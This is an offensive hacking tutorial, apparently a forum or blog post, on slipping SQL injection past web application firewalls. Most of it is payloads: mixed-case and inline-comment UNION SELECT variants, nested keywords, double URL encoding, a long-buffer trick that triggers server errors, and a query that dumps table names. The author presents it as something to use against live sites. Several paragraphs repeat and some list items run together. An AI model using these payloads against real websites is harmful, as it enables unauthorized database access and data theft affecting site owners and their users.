Waf & Waf Bypassing
Let’s explain firstly what WaF stands for and what it actually does for a website / server.
Waf is short for: Web Application Firewall, its purpose is to filter out a lot of our queries characters.
An example of a normal website we would inject on would look like:
An example of a normal website we would inject on would look like:
www.exmample.com/page.php?id=1 and 1=0 union all select 1,2,3,4,5--
If we do that with a WAF protected website will we get thrown out with a 403 FORBIDDEN error, or the 404 not found error.
Now that you know what a WAF is and what it does, I will show you some tip’s / tricks to bypass it.
Comments used to bypass:
If we do that with a WAF protected website will we get thrown out with a 403 FORBIDDEN error, or the 404 not found error.
Now that you know what a WAF is and what it does, I will show you some tip’s / tricks to bypass it.
Comments used to bypass:
· //· -- · /**/· #· --+· -- -· ;· -- a
Now for bypassing some WaFs, the exploiting is quite similar to basic SQL injection, yet you have filters now that you have to bypass, here are a few queries that CAN bypass (It’s never 100%).
· page.php?id=1/*!UnIoN*/SeLeCT (In this case we use /! As they are used as inline MySQL comments (sort of php like) and we work with lower case and upper case letters to bypass it as well).
· page.php?id=1+UNIunionON+SeLselectECT+1,2,3,4,5— (In this case we use the double text, its seems rather weird but what it does, if a filter detects the union select, and the filter has preg_replace(php function) to replace our union select with a space (or nothing), it will still show like:
UNION SELECT 1,2,3,4,5--
· page.php?id=1%252f%252a*/UNION%252f%252a /SELECT (In this case we are using HTTP encoding (hence the %252f etc signs, to DOUBLE bypass certain WAF’S (this method works only on 10-15% of the sites I’ve personally tested on))).
Putting it all together:
www.exmample.com/page.php?id=1
www.exmample.com/page.php?id=1
/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables--
Which will result showing all the table names, just as Chapter 1.The rest of the exploiting you have to figure out yourself, I gave you the handles for WAF bypassing, a hacker has to do everything on his own to really master / learn something they want, all this does is tickle your brain.
Tips & Trick bypassing more:
1.
id=1+(UnIoN)+(SelECT)+2.
id=1+(UnIoN+SeLeCT)+3.
id=1+(UnI)(oN)+(SeL)(EcT)4. id=1+'UnI''On'+'SeL''ECT' 5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3—6.
id=1+UnIoN+SeLecT 1,2,3—7.
id=1+UnIOn/**/SeLect 1,2,3—8.
id=1+UNIunionON+SELselectECT 1,2,3—9.
id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—10.
id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—11.id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—12.id=1+un/**/ion+sel/**/ect+1,2,3--13.id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,314.id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--15.
id=1+/**/union/*&id=*/select/*&id=*/1,2,3--It’s only important to use these queries as weird as they look right now at the start of the query, meaning, the rest of the query you could try normal like:
The unknown 500 server error bypass.
A lot of you might not know that 500 server errors fall under WAF bypassing, it’s simply a technique used, we will use a certain amount of characters to bypass the filters.
A lot of you might not know that 500 server errors fall under WAF bypassing, it’s simply a technique used, we will use a certain amount of characters to bypass the filters.
Example:
index.php?id=-1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) /*!UNION*/ /*!SELECT*//**/1,2,3,4,5,6—xn The query looks quite big, the A = 1000x, to bypass common filters.